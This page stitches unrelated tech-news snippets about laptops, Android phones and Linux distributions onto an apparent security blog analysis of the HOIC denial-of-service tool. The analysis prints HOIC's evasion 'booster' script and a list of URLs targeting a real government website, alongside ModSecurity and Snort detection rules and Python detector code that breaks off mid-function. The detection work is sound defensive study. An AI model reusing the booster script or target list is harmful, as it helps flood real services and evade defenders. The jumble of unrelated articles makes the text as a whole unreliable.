timeslive.co.za: It was a happy New Year’s Day for gang who pulled off…R42m Postbank heist
Security Revealed
The Windows release of Kinect is coming up in a couple of days, but for most people that won’t be a major event: the Kinect they have is sitting on their TV or in a drawer, waiting to be taken out for an impromptu Dance Central 2 party. Of the 10 million Kinects out there, the only ones connected to computers are the ones being fiddled with by the various hackers and students making science projects out of the things.
But according to the Daily, Microsoft is hoping to remedy this particular situation by building Kinect sensors right into your laptops. TechCrunch alum Matt Hickey got to handle a pair of prototypes, which were confirmed to be official, not just one of the many experiments that hide within Microsoft’s various lairs.
Unfortunately the laptops were not ready for their debut and no pictures seem to have been permitted. But they are described as netbook-like, with a number of smaller sensors instead of a webcam, and what could be an IR LED at the bottom of the screen.
The inclusion of depth-sensing cameras on a laptop is an interesting idea, and if they can drive the price of the sensor array down, it might become a standard feature. Microsoft has clearly also been focusing on miniaturizing the Kinect hardware, as the bulky original would seem somewhat out of place on a petite netbook. Whether this smaller sensor set has the same capabilities as the larger isn’t clear and wasn’t discussed.
A smaller Kinect would also suggest that Microsoft’s next console, rumored to have Kinect built in, is nearing readiness. While many gaming industry insiders have discounted the idea that the next generation of consoles will be announced this year, the rumor mill says otherwise.
Computer World: What Megaupload’s Demise Teaches about Cloud Storage
Not only does it ship with Linux, It’s one of the most powerful 14″ laptops available. At first glance, the Alto 3880 will not strike envy into the hearts of any. Like any standard PC laptop, it’s dressed in glossy, molded plastic pieces. The design decisions here are almost certainly OEM driven as the laptop takes a 3-tone neutral color scheme that presents itself in a bit of an awkward way. The lid emulates a brushed metal look with an attractive ZaReason screen-print right in the center. This is the first of a couple nice touches on ZaReason’s behalf. If this unit is closed on your coffee table, your guests will probably ask you, “What’s a ZaReason?”. In this respect, I think it’s quite effective. The brushed metal look for laptop lids is a little dated now, so this will not trend well in the vanity department.
(Posted 27 Jan 2012 by aweber)
Your daughter’s birthday was beautiful and you have lots of videos and pictures from the event that have to be organized in a nice-looking way. Your graduation party was a blast and you want to remember it properly. Whatever the occasion, whatever the content, a custom-created DVD will pack your memories nicely and will spike your geek cred because you created it and hey, it looks so cool. But what tool should you use? There are professional, paid-for programs that can help you in creating a DVD, but why use another OS and pay when you have free OSs and free software to do this? You can use the command-line approach from start to finish, but sometimes a GUI that will wrap around these utilities looks like a nicer solution. Such a solution is DeVeDe, and it even has a Windows version if you insist, but I will focus on Linux (of course!) in this article.
A task force in North Carolina recently ruled that survivors of that state’s eugenics program should be paid $50,000 each in financial compensation.
AdaCore Security Advisory SA-2012-L119-003 Hash collisions in AWS
Simple and Elegant is all I have to say about Xubuntu 11.10. I have done a short Video Review on Xubuntu 11.10. Fast and stable, this *buntu favorite runs extremely well in my Virtual Machine. Check out this short video and try Xubuntu for free today!
We took a break from the Android round-up in December because, well, to be honest I was on vacation. But January gave us a few extra smartphones and the holidays are over, so we’re back. What we’ve got for you today leans into more expensive turf, and unfortunately, our favorite Android devices for the past two months are also exclusively at Verizon, so Big Red subscribers should pay attention.
Without further ado, these are our favorite December/January releases of the Android persuasion: The Samsung Galaxy Nexus, the LG Spectrum, and the Motorola Droid RAZR Maxx.
Enjoy!
Features:
Pros:
Cons:
If you’re looking for Android, the Galaxy Nexus is where you’ll find it. Ice Cream Sandwich is a joy compared to Gingerbread, and this coming from someone who is quite hard on Android. Of course, the screen on this bad boy is amazing, but as MG points out in his review, sometimes the phone is just too big to perform one-handed actions.
We also expected image quality to be better out of that 5-megapixel rear camera, but it simply can’t compete with the iPhone’s 8-megapixel shooter. (And no, I’m not saying that based on megapixels… Image quality is simply better with the 4S.) But that doesn’t really matter — an Android fan is an Android fan, and this is as good as Android gets.
Features:
Pros:
Cons:
I was hard on this phone when I first played around with it, and I still maintain that there’s nothing super special about the Spectrum. It’s not like the Rezound with Beats Audio integration or the Razr with its anorexic waist line. That said, you really won’t find these kinds of specs on an Android phone for just $200. In fact, I’d be so bold as to call it a steal.
I’m also pretty excited about that display. I have yet to put a Super AMOLED Plus up against this 720p True HD display, but I’d say it’s one of the most (if not, the most) stunning displays I saw at CES. Certainly worth consideration, especially if you are a fan of LG phones to begin with.
Features:
Pros:
Cons:
The Droid Razr Maxx is a very special phone. It kills the few things that were wrong with the original Razr — which is an excellent device, mind you — and then doubles the storage, to boot. I was originally bothered with how light the Razr was. It made premium materials feel cheap, but the extra heft and weight on the Razr Maxx really gives this phone a pricey, solid feel.
A Droid Razr update for Android 4.0 leaked out this week, so if you’re comfortable with tinkering then that’s an extra benefit to the Maxx. We’ll have a full review on this phone up very shortly, but from the short time I’ve spent with it thus far I’d say it has the superior hardware in this particular bunch of Android handsets.
It’ll all come down to what matters most to you. If that giant 720p screen excites you, go Galaxy Nexus all the way. The Spectrum, on the other hand, offers up some pretty killer specs at a much more reasonable price, while the Droid Razr Maxx wins in the hardware/design department.
QEMU KVM CVE-2012-0029 Local Privilege Escalation Vulnerability
Notice how the 11 comes before the ten. This does signify that eleven is, indeed, louder than ten. Everyone loves hating Unity. It’s new. It’s different. It’s pretty. It’s everything that Linux typically isn’t. People also love hating Ubuntu in general. While people struggle to make their Linux desktops look and feel more like OSX every day and there are over 9000 different OSX-like docks out there, people apparently really hate having something that looks and acts like an OSX desktop. It’s very odd.
In a previous blog post, we provided details of a DDoS attack tool called LOIC (Low Orbit Ion Canon) used by Anonymous and its supporters in denial of service attacks over the past year. Attackers are constantly changing their tactics and tools in response to defenders' actions. Recently, the SANS Internet Storm Center (ISC) also highlighted a JavaScript version of LOIC that, while generating the same attack traffic as our previous analysis showed, actually executed the attacks without the user "initiating" them by pressing any buttons.
SpiderLabs has identified a new DDoS attack tool in circulation called HOIC (High Orbit Ion Canon).
While it seems that most of the download links have been removed by law enforcement agencies, we were able to obtain a copy and have conducted dynamic analysis on it. Here are our findings.
HOIC is a Windows executable file. Once started, you will be presented with the following GUI screen:
If the attacker clicks on the + sign under TARGETS, they get another pop-up box where they can specify target data.
The attacker can then specify the following Target data:
After the attacker clicks on the Add button, they are taken back to the main screen.
The attacker can then adjust the THREADS number if desired to further increase the strength of the attack. When they are ready to launch the attack, they click on the "FIRE TEH LAZER!" button. With the default settings shown above, the HTTP requests look like this:
```
GET / HTTP/1.0
Accept: */*
Accept-Language: en
Host: www.hoic_target_site.com
```
If the target web server was Apache, example access_log entries would look like this:
```
72.192.214.223 - - [27/Jan/2012:08:57:59 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:57:59 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:00 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:01 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:02 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:03 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
72.192.214.223 - - [27/Jan/2012:08:58:03 -0600] "GET / HTTP/1.0" 200 21124 "-" "-"
```
Looking at this attack data, you may be asking yourself "How is HOIC different from LOIC?" First of all, LOIC had both TCP and UDP DDoS attacks in addition to HTTP attacks, whereas HOIC is strictly an HTTP DoS tool. The real difference, or enhancement, that HOIC has over LOIC is its use of what it calls "Booster Scripts."
This is taken directly from the HOIC DOCUMENTATION FOR HACKERS text file:
```
OK!
So BASICALLY
HOIC is pretty useless UNLESS it is used in combination with "BOOSTERS", AKA "SCRIPTS"/BOOST PACKS / BOOM BOOM POWER
These boosters come in the form of .HOIC scripts.

hoic scripts are very simple and follow VB6 mixed with vb.net syntax although slightly altered
here are the functions and globals that relate the HOIC:

booster -> This is a global variable that contains the contents of the current script (string)
Headers -> This is a global variable that is an array of strings, and will be used to form headers in requests sent to the target URL. To add a header, simply do something like this:
    Headers.Append("User-Agent: penis") or Headers.Append("User-Agent: penis x" + CStr(powerFactor)
lbIndex -> Index into list box (cant really be used outside of the program, useless to developers)
PostBuffer -> String buffer containing post parameters, ie PostBuffer = "lol=2&lolxd=5"
powerFactor -> Integer from 0-2, 0 being low, 1 being medium, 2 being high
totalbytessent -> a count of the number of bytes sent to the target already (persistent across each attack)
URL -> url to attack
UsePost -> boolean, true = uses post, otherwise itll use get
```
Let's take a look at a booster script called GenericBoost.hoic:
```
Dim useragents() as String
Dim referers() as String
dim randheaders() as string

// EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!

// populate list
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)"
useragents.Append "Googlebot/2.1 ( http://www.googlebot.com/bot.html) "
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13"
useragents.Append "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"
useragents.Append "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
useragents.Append "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
useragents.Append "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"
useragents.Append "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
useragents.Append "Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53"

// populate referer list
referers.Append "http://www.google.com/?q="+URL
referers.Append URL
referers.Append "http://www.google.com/"
referers.Append "http://www.yahoo.com/"

// Add random headers
randheaders.Append "Cache-Control: no-cache"
randheaders.Append "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2007 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
randheaders.Append "If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT"
randheaders.Append "If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT"

// ------------------ DO NOT EDIT BELOW THIS LINE

// generate random referer
Headers.Append "Referer: " + referers(RndNumber(0, referers.UBound))
// generate random user agent (DO NOT MODIFY THIS LINE)
Headers.Append "User-Agent: " + useragents(RndNumber(0, useragents.UBound))
// Generate random headers
Headers.Append randheaders(RndNumber(0, randheaders.UBound))
```
As you can see, the booster scripts set groups of various request header data including User-Agent, Referer and Cache-Control/If-Modified-Since data and will randomize the various combinations during attacks. After specifying the GenericBoost.hoic script and re-launching the attack, you can see that these request items are no longer static and instead randomly rotate between these data pieces:
```
GET / HTTP/1.0
Accept: */*
Accept-Language: en
Referer: http://www.hoic_target_site.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)
If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT
Host: www.hoic_target_site.com
```
```
GET / HTTP/1.0
Accept: */*
Accept-Language: en
Referer: http://www.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13
If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT
Host: www.hoic_target_site.com
```
In addition to the GenericBoost.hoic file, there are two other scripts that target specific web sites. One script specifically targets a government web site in retaliation for prosecuting someone for using LOIC in previous attacks. The .hoic file includes a list of URLs on the target website that the tool rotates through:
```
// populate rotating urls
// IF YOU WANT TO IMPROVE THE ATTACK, ADD URLS BELONGING TO THIS DOMAIN OR RELATED SUBDOMAINS!!! PRO-TIP: You should create anew target and .HOIC file if u want to attack a different organization
randURLs.Append "http://www.om.nl/"
randURLs.Append "http://www.om.nl/onderwerpen/cybercrime/"
randURLs.Append "http://www.om.nl/vast_menu_blok/contact/"
randURLs.Append "http://www.om.nl/actueel/nieuws-_en/"
randURLs.Append "http://www.om.nl/actueel/columns/"
randURLs.Append "http://www.om.nl/organisatie/"
randURLs.Append "http://www.om.nl/actueel/omtv_0/"
randURLs.Append "http://www.om.nl/"
randURLs.Append "http://www.om.nl/?rss=true"
randURLs.Append "http://www.om.nl/"
randURLs.Append "http://www.om.nl/actueel/strafzaken/"
randURLs.Append "http://www.om.nl/"
randURLs.Append "http://www.om.nl/actueel/publicaties/"
randURLs.Append "http://www.om.nl/organisatie/item_144364/"
randURLs.Append "http://www.om.nl/"
randURLs.Append "http://www.om.nl/onderwerpen/drugs/"
randURLs.Append "http://www.om.nl/onderwerpen/commissie_evaluatie/"
randURLs.Append "http://www.om.nl/actueel/agenda/"
randURLs.Append "http://www.om.nl/actueel/strafzaken/"
randURLs.Append "http://www.om.nl/onderwerpen/bouwfraude/"
randURLs.Append "http://www.om.nl/onderwerpen/mensenhandel_en/"
randURLs.Append "http://www.om.nl/onderwerpen/snelrecht_en/"
randURLs.Append "http://www.om.nl/"
randURLs.Append "http://www.om.nl/onderwerpen/voorkennis/"
randURLs.Append "http://www.om.nl/actueel/agenda/"
```
By randomizing these request characteristics, it makes things more challenging for defenders to create defensive rules to identify the individual attack payloads. While it does make detection more difficult, it is still possible.
While the HOIC requests try to evade detection through randomization techniques, there are still some request attributes which can be used to identify attack traffic. Most of these tell-tale signs are abnormalities when compared with real web browsers.
Before we discuss some of the unique identifiers of HOIC traffic, we wanted to highlight the generic detection of automated DoS tools through traffic velocity violations. The OWASP ModSecurity Core Rule Set (CRS) has a denial of service detection rule set that can identify DoS attacks. The ModSecurity admin only needs to activate the file and then edit the following directives in the modsecurity_crs_10_config.conf file:
```
## -=[ DoS Protection ]=-
#
# If you are using the DoS Protection rule set, then uncomment the following
# lines and set the following variables:
# - Burst Time Slice Interval: time interval window to monitor for bursts
# - Request Threshold: request # threshold to trigger a burst
# - Block Period: temporary block timeout
#
#SecAction "phase:1,id:'981215',t:none,nolog,pass, \
setvar:'tx.dos_burst_time_slice=60', \
setvar:'tx.dos_counter_threshold=100', \
setvar:'tx.dos_block_timeout=600'"
```
When a HOIC attack is run against the ModSecurity site, the following alerts will be generated:
```
[Fri Jan 27 13:44:39 2012] [error] [client 192.168.1.103] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/usr/local/apache/conf/crs/base_rules/modsecurity_crs_11_dos_protection.conf"] [line "11"] [id "981044"] [msg "Denial of Service (DoS) Attack Identified from 192.168.1.103 (237 hits since last alert)"] [hostname "192.168.1.100"] [uri "/"] [unique_id "TyLwl8CoAWQAATFkSFoAAAAG"]
```
These rules will initiate the drop action on all traffic from the attacking source and will provide periodic alerting with traffic stat counts. Besides alerting on traffic velocity violations, there are a number of other HOIC-specific attributes that may prove useful in the short term to uniquely identify the attack tool in use.
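As an added illustration (not SpiderLabs' or the OWASP CRS's own code), the Python below implements the same idea as the three directives above: a per-source sliding window of `dos_burst_time_slice` seconds, a `dos_counter_threshold` request count that triggers a burst, and a `dos_block_timeout` during which further requests from that source are dropped. It runs over constructed Apache access_log lines modelled on the HOIC sample earlier in the post; the class and function names and the second client IP are this example's own assumptions.

```python
"""Added example (not SpiderLabs' or the OWASP CRS's code): a sliding-window
request-velocity check with the same three knobs as the CRS directives
(burst time slice, request threshold, block timeout), run over constructed
Apache access_log lines modelled on the HOIC sample in the post."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache combined-log prefix: client IP, ident, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
APACHE_TS = "%d/%b/%Y:%H:%M:%S %z"


class BurstDetector:
    """Per-source sliding window. Mirrors dos_burst_time_slice /
    dos_counter_threshold / dos_block_timeout in spirit; the class and
    method names are this example's own, not ModSecurity's."""

    def __init__(self, time_slice=60, threshold=100, block_timeout=600):
        self.window = timedelta(seconds=time_slice)
        self.threshold = threshold
        self.block_for = timedelta(seconds=block_timeout)
        self.hits = defaultdict(deque)   # ip -> timestamps inside the window
        self.blocked_until = {}          # ip -> datetime the block expires

    def observe(self, ip, ts):
        """Return 'blocked' while a block is active, 'burst' on the request
        that crosses the threshold, 'ok' otherwise."""
        until = self.blocked_until.get(ip)
        if until is not None and ts < until:
            return "blocked"
        q = self.hits[ip]
        q.append(ts)
        while q and ts - q[0] > self.window:   # drop hits older than the slice
            q.popleft()
        if len(q) >= self.threshold:
            self.blocked_until[ip] = ts + self.block_for
            q.clear()
            return "burst"
        return "ok"


def analyse(lines, **knobs):
    """Feed log lines through the detector; return {ip: {verdict: count}}."""
    det = BurstDetector(**knobs)
    verdicts = defaultdict(lambda: {"ok": 0, "burst": 0, "blocked": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log entry; skip it
        ts = datetime.strptime(m["ts"], APACHE_TS)
        verdicts[m["ip"]][det.observe(m["ip"], ts)] += 1
    return dict(verdicts)


def build_sample_log(n_attack=120, n_normal=3):
    """Constructed sample: one source fires n_attack requests at 20/s (the
    HOIC pattern seen in the post's log excerpt), while a normal client sends
    n_normal requests spread over a minute. 198.51.100.7 is a placeholder."""
    base = datetime(2012, 1, 27, 8, 57, 59, tzinfo=timezone(timedelta(hours=-6)))

    def line(ip, ts, request, size, ua):
        return f'{ip} - - [{ts.strftime(APACHE_TS)}] "{request}" 200 {size} "-" "{ua}"'

    lines = [line("72.192.214.223", base + timedelta(seconds=i // 20), "GET / HTTP/1.0", 21124, "-")
             for i in range(n_attack)]
    lines += [line("198.51.100.7", base + timedelta(seconds=20 * i), "GET /index.html HTTP/1.1", 5120, "Mozilla/5.0")
              for i in range(n_normal)]
    return lines


if __name__ == "__main__":
    for ip, counts in analyse(build_sample_log()).items():
        print(ip, counts)
```

With the CRS defaults (60-second slice, 100 requests, 600-second block) the attacking source is flagged on its 100th request and every later request inside the block period is dropped, while the slow client never trips the counter. The window is a deque per source, so memory stays proportional to the number of requests inside the slice rather than to the whole log.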
All of the requests specify "HTTP/1.0" however they also include the "Host:" request header, which wasn't introduced until HTTP/1.1. The Host header's main purpose was to help conserve IP address space by allowing name-based virtual hosting. Without a Host header, each web site would have to have a unique IP address.
With this detection mechanism in mind, we can use the following ModSecurity rule to generically catch any HTTP/1.0 client that submits a Host header:
```
SecRule &REQUEST_HEADERS:Host "@eq 1" "chain,phase:1,t:none,log,block,msg:'HTTP v1.0 Client Anomaly - Host Header Sent.'"
    SecRule REQUEST_PROTOCOL "!@streq HTTP/1.1"
```
While the request header names and payloads, in and of themselves, are valid, the order in which they appear in the request does not match what normal web browsers would send. Two good references for browser fingerprinting/header ordering are the Browser Recon Project and p0f3 (passive OS fingerprinting).
The Browser Recon Project has a Header Order DB with info on a large number of HTTP clients. The only limitation with this dataset is that it is quite old. The last update was in June 2008.
Michal Zalewski recently updated his Passive OS Fingerprinting (p0f) tool to v3, which includes application layer fingerprinting capabilities. This includes analysis of HTTP clients by means of header ordering analysis. Here is a section of the p0f.fp file for HTTP client fingerprints for Microsoft's Internet Explorer and Google's Chrome browsers:
```
; ----
; MSIE
; ----

label = s:!:MSIE:8 or newer
sys   = Windows

sig   = 1:Accept=[*/*],?Referer,?Accept-Language,User-Agent,Accept-Encoding=[gzip, deflate],Host,Connection=[Keep-Alive]:Keep-Alive,Accept-Charset,UA-CPU:(compatible; MSIE
sig   = 1:Accept=[*/*],?Referer,?Accept-Language,Accept-Encoding=[gzip, deflate],User-Agent,Host,Connection=[Keep-Alive]:Keep-Alive,Accept-Charset:(compatible; MSIE

label = s:!:MSIE:7
sys   = Windows

sig   = 1:Accept=[*/*],?Referer,?Accept-Language,UA-CPU,User-Agent,Accept-Encoding=[gzip, deflate],Host,Connection=[Keep-Alive]:Keep-Alive,Accept-Charset:(compatible; MSIE

; TODO: Check if this one ever uses Accept-Language, etc. Also try to find MSIE 5.

label = s:!:MSIE:6
sys   = Windows

sig   = 0:Accept=[*/*],?Referer,User-Agent,Host:Keep-Alive,Connection,Accept-Encoding,Accept-Language,Accept-Charset:(compatible; MSIE
sig   = 1:Accept=[*/*],Connection=[Keep-Alive],Host,?Pragma=[no-cache],?Range,?Referer,User-Agent:Keep-Alive,Accept-Encoding,Accept-Language,Accept-Charset:(compatible; MSIE

; ------
; Chrome
; ------

label = s:!:Chrome:11 or newer
sys   = Windows,@unix

sig   = 1:Host,Connection=[keep-alive],User-Agent,Accept=[*/*],?Referer,Accept-Encoding=[gzip,deflate,sdch],Accept-Language,Accept-Charset=[utf-8;q=0.7,*;q=0.3]:: Chrom
sig   = 1:Host,Connection=[keep-alive],User-Agent,Accept=[*/*],?Referer,Accept-Encoding=[gzip,deflate,sdch],Accept-Language,Accept-Charset=[UTF-8,*;q=0.5]:: Chrom
sig   = 1:Host,User-Agent,Accept=[*/*],?Referer,Accept-Encoding=[gzip,deflate,sdch],Accept-Language,Accept-Charset=[utf-8;q=0.7,*;q=0.3],Connection=[keep-alive]::Chrom
```
By comparing against the valid header orderings shown here in p0f3, we can see that the HOIC header ordering is abnormal. The easiest characteristic to notice is that, in HOIC, the Host header is always listed last in the header order, which is not the case for any legitimate browser.
The following ModSecurity rule will inspect the header ordering of the client request and then alert if the Host header is listed last:
```
SecRule REQUEST_HEADERS_NAMES ".*" "chain,phase:1,t:none,log,block,msg:'Request Header Anomaly - Host Header Listed Last.',setvar:'tx.header_order=%{tx.header_order}, %{matched_var}'"
    SecRule TX:HEADER_ORDER "@endsWith , Host"
```
This rule uses ModSecurity's macro expansion capability to create a custom variable which captures the order of the request header names. Here is an example from the debug log showing how this rule processing works:
```
Recipe: Invoking rule 1015de5c0; [file "/usr/local/apache/conf/crs/base_rules/modsecurity_crs_15_custom.conf"] [line "1"].
Rule 1015de5c0: SecRule "REQUEST_HEADERS_NAMES" "@rx .*" "phase:1,chain,t:none,log,block,msg:'Request Header Anomaly - Host Header Listed Last.',setvar:'tx.header_order=%{tx.header_order}, %{matched_var}'"
Expanded "REQUEST_HEADERS_NAMES" to "REQUEST_HEADERS_NAMES:Accept|REQUEST_HEADERS_NAMES:Accept-Language|REQUEST_HEADERS_NAMES:Referer|REQUEST_HEADERS_NAMES:User-Agent|REQUEST_HEADERS_NAMES:If-Modified-Since|REQUEST_HEADERS_NAMES:Host".
Transformation completed in 1 usec.
Executing operator "rx" with param ".*" against REQUEST_HEADERS_NAMES:Accept.
Target value: "Accept"
Operator completed in 2 usec.
Setting variable: tx.header_order=%{tx.header_order}, %{matched_var}
Resolved macro %{matched_var} to: Accept
Set variable "tx.header_order" to ", Accept".
Transformation completed in 0 usec.
Executing operator "rx" with param ".*" against REQUEST_HEADERS_NAMES:Accept-Language.
Target value: "Accept-Language"
Operator completed in 1 usec.
Setting variable: tx.header_order=%{tx.header_order}, %{matched_var}
Resolved macro %{tx.header_order} to: , Accept
Resolved macro %{matched_var} to: Accept-Language
Set variable "tx.header_order" to ", Accept, Accept-Language".
...
--CUT--
...
Executing operator "rx" with param ".*" against REQUEST_HEADERS_NAMES:Host.
Target value: "Host"
Operator completed in 1 usec.
Setting variable: tx.header_order=%{tx.header_order}, %{matched_var}
Resolved macro %{tx.header_order} to: , Accept, Accept-Language, Referer, User-Agent, If-Modified-Since
Resolved macro %{matched_var} to: Host
Set variable "tx.header_order" to ", Accept, Accept-Language, Referer, User-Agent, If-Modified-Since, Host".
Rule returned 1.
Match -> mode NEXT_RULE.
Recipe: Invoking rule 1015df398; [file "/usr/local/apache/conf/crs/base_rules/modsecurity_crs_15_custom.conf"] [line "2"].
Rule 1015df398: SecRule "TX:HEADER_ORDER" "@endsWith , Host"
Transformation completed in 0 usec.
Executing operator "endsWith" with param ", Host" against TX:header_order.
Target value: ", Accept, Accept-Language, Referer, User-Agent, If-Modified-Since, Host"
Operator completed in 8 usec.
Warning. String match ", Host" at TX:header_order. [file "/usr/local/apache/conf/crs/base_rules/modsecurity_crs_15_custom.conf"] [line "1"] [msg "Request Header Anomaly - Host Header Listed Last."]
```
Another interesting characteristic of HOIC traffic is that many of the Request Header payloads have leading double-spaces in them. Look at this pcap capture in wireshark:
In this screenshot, we are highlighting the Keep-Alive field. Notice that after the header name and semi-colon there are actually two space characters (20 20) before the 115 payload text in the hex window. A number of headers in this request exhibit this behavior. After analyzing the various .hoic files included in the download, we determined that this can be reliably flagged on the User-Agent field, as it is included with almost all requests.
We attempted to create a ModSecurity rule to detect this issue, however Apache is executing some pre-processing on the header values before passing this data off to ModSecurity and these leading space characters are not visible to ModSecurity.
If you are running Snort IDS, you can use the following rule (Thanks to SpiderLabs' Rodrigo Montoro) to detect this same traffic on the network prior to reaching the web server:
```
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SLR Alert - HOIC Generic Detection with booster - HTTP 1.0 / Header Double Spacing"; flow:established,to_server; content:"User-Agent|3a 20 20|"; nocase; content:"HTTP/1|2e|0"; nocase; reference:url,blog.spiderlabs.com; threshold: type both, track by_src, count 15, seconds 30; classtype: slr-tw; sid:1; rev:1; )
```
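The three HOIC request attributes described above (a Host header on an HTTP/1.0 request, Host listed last in the header order, and two spaces after the colon on the User-Agent header) can also be checked outside the web server, where the raw header values are still intact. The Python below is an added example, not SpiderLabs', ModSecurity's or p0f's code: it parses a raw request head, rebuilds the same comma-joined header order that the `tx.header_order` variable accumulates in the debug log, and reports each anomaly. Both sample requests are constructed for the example, the HOIC one after the booster-script request shown earlier (with the double space the pcap revealed) and the browser one after the Chrome ordering in the p0f signatures; `www.example.com` is a placeholder.

```python
"""Added example (not SpiderLabs', ModSecurity's or p0f's code): the three
HOIC request anomalies from the post checked on raw request text, where the
leading spaces Apache strips before ModSecurity sees them are still visible."""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Request:
    method: str
    target: str
    version: str
    headers: List[Tuple[str, str]]  # (name, raw text after the colon), in wire order


def parse_request(raw: str) -> Request:
    """Split a raw HTTP/1.x request head into its request line and headers.
    The value is kept exactly as sent (leading whitespace included) because
    the double-space check depends on it."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")   # split on the first colon only
        headers.append((name.strip(), value))
    return Request(method, target, version, headers)


def header_order(req: Request) -> str:
    """Comma-joined header names, the string the ModSecurity chain above
    builds into tx.header_order (without its leading ', ')."""
    return ", ".join(name for name, _ in req.headers)


def find_anomalies(req: Request) -> List[str]:
    """Return the HOIC tell-tale signs present in the request, if any."""
    findings = []
    names = [name.lower() for name, _ in req.headers]
    # 1. Host was introduced with HTTP/1.1; an HTTP/1.0 request carrying it is odd.
    if req.version == "HTTP/1.0" and "host" in names:
        findings.append("http10-with-host")
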